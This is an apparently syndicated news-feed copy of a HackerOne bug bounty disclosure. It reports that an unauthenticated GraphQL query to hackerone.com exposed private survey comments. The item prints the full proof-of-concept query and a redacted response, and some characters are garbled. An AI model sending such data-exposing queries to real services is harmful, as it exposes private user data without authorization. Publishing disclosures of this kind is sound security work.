๐ HackerOne: Team object in GraphQL disclosed private_comment
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Summary: Hi Team, Some private(I think) part of GraphQL reveals to us Steps To Reproduce Without authorization https://hackerone.com/graphql POST: {"query":"query { node(id: \\"gid://hackerone/SurveyRatingItem/โโโโโ\\") { ... on SurveyRatingItem{_id,pentester{_id},team{_id},key,private_comment,public_comment,rating,recipient{username,email},subject{... on Report{_id}},survey_rating{_id,team{_id},state,respondent{_id,username,email,pentests{nodes{_id}}}}}}}","variables":{}} {"data":{"node":{"_id":"โโโโโโโโ","pentester":null,"team":null,"key":"scope","private_comment":"โโโโ","public_comment":null,"rating":1,"recipient":null,"subject":null,"survey_rating":{"_id":"โโโโโ","team":null,"state":"completed","respondent":{"_id":"โโโโ","username":"โโโ","email":null,"pentests":{"nodes":[]}}}}}} As we can see, the key field takes the value scope, we don't see in which program this happens, but we can see the comments of the participant, and as we can see, it has the status private PS. Yes, we do not see some data, but in the future they may be disclosed in the comments (I think so) Impact disclosed... ...